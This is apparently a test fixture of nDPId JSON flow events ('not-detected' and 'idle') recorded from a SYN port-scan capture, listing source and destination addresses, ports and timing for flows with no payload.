-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7741,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3659,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3659,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3659,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3659,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52822,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52822,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5730,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5730,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5730,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5730,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26214,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26214,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3689,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1641,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1641,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 